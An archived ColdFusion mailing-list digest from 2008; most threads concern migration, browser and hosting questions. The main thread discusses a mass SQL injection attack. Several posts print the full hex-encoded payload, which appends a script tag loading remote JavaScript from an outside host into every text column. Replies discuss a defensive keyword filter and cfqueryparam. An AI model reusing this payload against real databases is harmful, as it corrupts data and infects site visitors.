What happens if you create those unscoped vars in onRequest? Adrian -Original Message- From: Richard Steele [mailto:[EMAIL PROTECTED] Sent: 21 July 2008 16:44 To: CF-Talk Subject: Problems with switching from application.cfm to application.cfc We are now using CF8 and want to take advantage of features in application.cfc. In particular we want to take advantage of the missing template handler of CF8 application.cfc. However, in our current application.cfm file we had defined 20 or so variables that were not scoped (eg. xcachepath=/cache. In application.cfc, these variables evidently need to be scoped (eg. request.xcachepath=/cache. This is a huge website and the thought of searching and replacing these variables and then uploading each one of thousands of files to our production server is daunting and could take many days of work. If there is no work around to the above problem, can the missing template handler be used in the application.cfm? Many thanks in advance. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309345 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Drop database foo Crap, I just let another one slip. Brace yourself for another wave of attacks... :) Lets not forget what a mess Little Bobby Tables made. http://xkcd.com/327/ -- If everything seems under control, you're not going fast enough -- Mario Andretti ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309346 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Problems with switching from application.cfm to application.cfc
It's as if they don't exist. Variable not found errors abound. What happens if you create those unscoped vars in onRequest? Adrian We are now using CF8 and want to take advantage of features in application.cfc. In particular we want to take advantage of the missing template handler of CF8 application.cfc. However, in our current application.cfm file we had defined 20 or so variables that were not scoped (eg. xcachepath=/cache. In application.cfc, these variables evidently need to be scoped (eg. request.xcachepath=/cache. This is a huge website and the thought of searching and replacing these variables and then uploading each one of thousands of files to our production server is daunting and could take many days of work. If there is no work around to the above problem, can the missing template handler be used in the application.cfm? Many thanks in advance. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309347 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Mutha!!! Our company JUST had this happen. We're working through it right now. Thanks for the confirmation guys. Appreciated. -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 10:42 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Works great for me. You have to remove the extra line breaks though. Here is what it does: Did you read the blog I posted? It explains it all. -Original Message- From: Che Vilnonis [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 10:32 AM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Tried printing the code in SQL Analyzer and got nothing. Can anyone translate it to text? Not sure what I am missing. /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263 6861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220 464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563 7473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420 612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E7874797065 3D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045 4E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F 4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F535441545553 3D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B27 2B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372 633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C 212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F746974 6C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A 7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D202054 6162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65 5F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); -Original Message- From: Gerald Guido [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:12 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... Why bother looking around the internet? Use your SQL server to decode it! Huh... Learn sumptin new every day. That is why I keep coming back here. ;) Thanx Brad. ~G~ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309348 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I am seeing these too on our site, in errors generated by bad data going into a cfqueryparam. If several people on this list are seeing this attack, it must be pretty widespread. -- Josh - Original Message - From: Che Vilnonis [EMAIL PROTECTED] To: CF-Talk cf-talk@houseoffusion.com Sent: Monday, July 21, 2008 7:54 AM Subject: SPAM (ot) URL Hack Attempt Leaves Me Scractching My Head... Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309349 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Instantiated CFC behaving incorrectly in IE7 Safari, but wo rks in Firefox
I've got a simple component that I'm instantiating to There is nothing in the code you've shown that is browser-specific. So, the problem is somewhere else. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! You were right. I have been troubleshooting this code when all along it was an AJAX issue. I was starting to think I was going crazy over this. ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309350 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309351 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: Experiences with Railo
H-Shpere was unfortunately bought by the same folks that own Plesk - a company now called Parellels. I would not be surprised if they attempt to move H-Shpere users toward Plesk in the very near future. Parallels was previously SW-Soft - makers of Plesk and Virtuozzo and a whole host of very popular hosting-related software. They went through a buying spree about 6 months ago - buying up their competitors and absorbing their products and their customers. Some of the victims of this process were Comodo's H-sphere, FreeVPS (a Virtuozzo competitor) and CP+ (a Plesk competitor). Further development on FreeVPS and CP+ has been halted, and Parallels has made no attempts to offer a migration path for customers who were using them. This has cost my company tens of thousands of dollars in migration efforts away from CP+ and FreeVPS. It's a crying shame because both FreeVPS and CP+ were *excellent* products, and served us very well for many years. Parallels also publicly stated that they would offer migration paths for customers who were effected by their acquisitions - this never happened. Despite my phone calls and emails asking for said promised service. They never came through. Parallels lies. I do not trust them. I will not use, nor would I recommend their products, or products owned by them, to anyone. Warm regards, Jordan Michaels Vivio Technologies http://www.viviotech.net/ Open BlueDragon Steering Committee Adobe Solution Provider Gerald Guido wrote: Yeah... I forgot about the whole MySQL Debacle with Plesk. That sucked. The one thing I really liked about it was being able to use the API to manage email accounts and user accounts right in our CMS. Anything to not have the phone ring off the hook If you ever need a Hosting CP I would look at H-sphere. I have ran into a few minor speed bumps with it, but over all I have been very happy with it over the years. They have a single server version for *nix.. I think it is free cuz I cant find a price for it. Anyways is only $4.50 per client licence for the full blown version. http://www.psoft.net/promo/single_server.html ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309352 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
We're getting hit hard today with this. /rss.cfm? Is is just rss.cfm? I haven't looked at our logs yet. Where did you see this. The server log files? ~~G~~ On Mon, Jul 21, 2008 at 12:53 PM, Kris Jones [EMAIL PROTECTED] wrote: We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309353 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: Experiences with Railo
Please accept my apologies. I should not have stated this on a public mailing list. It was an emotional response to past experiences that I should have kept under control. Again, my apologies. Warm regards, Jordan Michaels Vivio Technologies http://www.viviotech.net/ Open BlueDragon Steering Committee Adobe Solution Provider Jordan Michaels wrote: H-Shpere was unfortunately bought by the same folks that own Plesk - a company now called Parellels. I would not be surprised if they attempt to move H-Shpere users toward Plesk in the very near future. Parallels was previously SW-Soft - makers of Plesk and Virtuozzo and a whole host of very popular hosting-related software. They went through a buying spree about 6 months ago - buying up their competitors and absorbing their products and their customers. Some of the victims of this process were Comodo's H-sphere, FreeVPS (a Virtuozzo competitor) and CP+ (a Plesk competitor). Further development on FreeVPS and CP+ has been halted, and Parallels has made no attempts to offer a migration path for customers who were using them. This has cost my company tens of thousands of dollars in migration efforts away from CP+ and FreeVPS. It's a crying shame because both FreeVPS and CP+ were *excellent* products, and served us very well for many years. Parallels also publicly stated that they would offer migration paths for customers who were effected by their acquisitions - this never happened. Despite my phone calls and emails asking for said promised service. They never came through. Parallels lies. I do not trust them. I will not use, nor would I recommend their products, or products owned by them, to anyone. Warm regards, Jordan Michaels Vivio Technologies http://www.viviotech.net/ Open BlueDragon Steering Committee Adobe Solution Provider Gerald Guido wrote: Yeah... I forgot about the whole MySQL Debacle with Plesk. That sucked. The one thing I really liked about it was being able to use the API to manage email accounts and user accounts right in our CMS. Anything to not have the phone ring off the hook If you ever need a Hosting CP I would look at H-sphere. I have ran into a few minor speed bumps with it, but over all I have been very happy with it over the years. They have a single server version for *nix.. I think it is free cuz I cant find a price for it. Anyways is only $4.50 per client licence for the full blown version. http://www.psoft.net/promo/single_server.html ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309354 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Good on ya, mate. If there were an award for using cfqueryparam I would give it to you. Since this seems to be such a hot topic right now, has anyone heard of a CFML code scanner to check for vulnerable cfqueries kind of like the var scoper does? Maybe we should write one to promote security in the CF community. ~Brad -Original Message- From: Kris Jones [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:53 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309355 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
I was just looking into that myself. http://qpscanner.riaforge.org/ On Mon, Jul 21, 2008 at 1:06 PM, Brad Wood [EMAIL PROTECTED] wrote: Good on ya, mate. If there were an award for using cfqueryparam I would give it to you. Since this seems to be such a hot topic right now, has anyone heard of a CFML code scanner to check for vulnerable cfqueries kind of like the var scoper does? Maybe we should write one to promote security in the CF community. ~Brad -Original Message- From: Kris Jones [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:53 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309356 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
+1 Good idea! -Original Message- From: Brad Wood [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 1:06 PM To: CF-Talk Subject: RE: (ot) URL Hack Attempt Leaves Me Scractching My Head... Good on ya, mate. If there were an award for using cfqueryparam I would give it to you. Since this seems to be such a hot topic right now, has anyone heard of a CFML code scanner to check for vulnerable cfqueries kind of like the var scoper does? Maybe we should write one to promote security in the CF community. ~Brad -Original Message- From: Kris Jones [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 11:53 AM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... We're getting hit hard today with this. They're failing, because we use cfqueryparam and cfprocparam. But it is quite annoying. -KJ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309357 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Sweet nectar... I'm trying this out and blogging it tonight. If it's pretty easy to run I think we should promote an international check your freakin' cfqueries day! Who want to buy the party hats and streamers? ~Brad -Original Message- From: Joshua Cyr [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 12:09 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... I was just looking into that myself. http://qpscanner.riaforge.org/ ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309358 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309359 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Even easier than monkeying with every single one of your cfquery's just add following line to the TOP of all your application.cfm's: cfif cgi.SCRIPT_NAME contains EXEC( OR cgi.PATH_INFO contains EXEC( OR cgi.QUERY_STRING contains EXEC(cfabort/cfif This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for. peace, j Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309360 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
It'll show in your logs of course. We also have error reports that dump the error info and certain collections and mail it to the dev team. -KJ We're getting hit hard today with this. /rss.cfm? Is is just rss.cfm? I haven't looked at our logs yet. Where did you see this. The server log files? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309361 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Even easier than monkeying with every single one of your cfquery's just add following line to the TOP of all your application.cfm's: cfif cgi.SCRIPT_NAME contains EXEC( OR cgi.PATH_INFO contains EXEC( OR cgi.QUERY_STRING contains EXEC(cfabort/cfif That would stop this specific problem, but would be easily circumvented by using one of the other mechanisms for executing strings on SQL Server. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309362 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Band-Aids and duct tape... Filtering for known attacks: moderately useful as a stop gap if you are in the middle of an attack. Holistic approach to seal the original vulnerability against ALL current and future attacks (cfqueryparam): highly desirable. ~Brad -Original Message- From: james carberry [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 12:54 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... Even easier than monkeying with every single one of your cfquery's just add following line to the TOP of all your application.cfm's: cfif cgi.SCRIPT_NAME contains EXEC( OR cgi.PATH_INFO contains EXEC( OR cgi.QUERY_STRING contains EXEC(cfabort/cfif This will immediately shut down execution of any CFM that this piece of trash tries to invoke to execute this particular type of SQL for. peace, j ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309363 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
Just put the following line at the TOP of your application.cfm to innoculate your CF webs against this attack: cfif cgi.SCRIPT_NAME contains EXEC( OR cgi.PATH_INFO contains EXEC( OR cgi.QUERY_STRING contains EXEC(cfabort/cfif peace, j Just was looking at a 'user monitor' page on one of my sites and I saw the url string below being called. I've seen several sql injection urls before, but what the heck are they trying to accomplish here? Eeverything is cfqueryparam'ed. Thanks, Che /rss.cfm?';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C404320766172636861 72283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F 522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A65637473 20612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E 78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D33 35206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E20 5461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F4375 72736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D30 2920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40 432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D 22687474703A2F2F312E766572796E782E636E2F772E6A73223E3C2F7363726970743E3C212D 2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C65 3E3C736372697074207372633D22687474703A2F2F312E766572796E782E636E2F772E6A7322 3E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D2020546162 6C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F43 7572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S); ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309364 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
We had the same hack on our site, did you guys figure out exactly what happened or how and where the sql was ran? or what the hackers purpose was? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309365 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
The hacker's hope is that you will be outputting one of those varchar fields into a webpage without escaping HTML characters. The extra text being inserted into the database fields will include a malicious JavaScript file from another server into the webpage. I haven't looked at the JS to see what it does, but it probably tries to load some Trojan via an active X applet or something. To clean your database, I would recommend reverse-engineering the attack to loop over your database columns and remove the text they placed in there. In the mean time, shut your site down so you don't infect your customers. ~Brad -Original Message- From: Wayne Janeck [mailto:[EMAIL PROTECTED] Sent: Monday, July 21, 2008 1:43 PM To: CF-Talk Subject: Re: (ot) URL Hack Attempt Leaves Me Scractching My Head... We had the same hack on our site, did you guys figure out exactly what happened or how and where the sql was ran? or what the hackers purpose was? ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309366 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
RE: (ot) URL Hack Attempt Leaves Me Scractching My Head...
The hacker's hope is that you will be outputting one of those varchar fields into a webpage without escaping HTML characters. The extra text being inserted into the database fields will include a malicious JavaScript file from another server into the webpage. I haven't looked at the JS to see what it does, but it probably tries to load some Trojan via an active X applet or something. To clean your database, I would recommend reverse-engineering the attack to loop over your database columns and remove the text they placed in there. In the mean time, shut your site down so you don't infect your customers. For what it's worth, the specific URL that was injected in the sample I saw (http://1.verynx.cn/w.js) doesn't seem to work anymore. The server name doesn't resolve. Second, if you can restore a previous copy of the database, that might be easier. Also, I'd recommend that you identify the problem scripts that contain the vulnerability before you restore the database. Otherwise, you might have to repeat the process. Finally, you might consider implementing filtering at the web server to block long (and presumably problematic) URLs before they're even sent to CF. If you're using IIS, you can do that with the latest version of URLScan. If you're using Apache, I think mod_security will let you do this. Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ Fig Leaf Software provides the highest caliber vendor-authorized instruction at our training centers in Washington DC, Atlanta, Chicago, Baltimore, Northern Virginia, or on-site at your location. Visit http://training.figleaf.com/ for more information! ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:309367 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
Re: (ot) URL Hack Attempt Leaves Me Scractching My Head...
